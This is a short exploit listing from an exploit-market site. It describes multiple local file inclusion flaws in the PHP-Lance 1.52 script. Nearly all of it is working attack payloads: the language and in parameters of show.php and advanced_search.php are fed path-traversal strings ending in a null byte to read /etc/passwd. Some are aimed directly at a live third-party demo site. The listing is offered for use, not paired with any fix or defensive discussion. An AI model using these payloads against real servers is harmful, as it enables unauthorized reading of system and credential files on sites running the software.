[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Lance 1.52 Multiple Local File Inclusion Vulnerabilities

Author
jetli007
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5658
Category
web applications
Date add
17-08-2009
Platform
unsorted
============================================================
PHP-Lance 1.52 Multiple Local File Inclusion Vulnerabilities
============================================================


#############################
Name : PHP-Lance v1.52
price US $349.95 :p
Demo : http://www.scriptdemo.com/php-lance/
############################# 

-------------------------------------------------------------------------
PoC's:

   - http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
   - http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
   - http:// 127.0.0.1 / [path] /advanced_search.php?in=[LFI]

 LiveDemo:

   - http://www.scriptdemo.com/php-lance/show.php?catid=5&sch=yellow&language=../../../../../../../../../../../../../etc/passwd%00

   - http://www.scriptdemo.com/php-lance/show.php?catid=5&sch=yellow&language=../../../../../../../../../../../../../etc/passwd%00
  
   - http://www.scriptdemo.com/php-lance/advanced_search.php?in=../../../../../../../../../../../../../etc/passwd%00
-------------------------------------------------------------------------



#  0day.today [2024-12-26]  #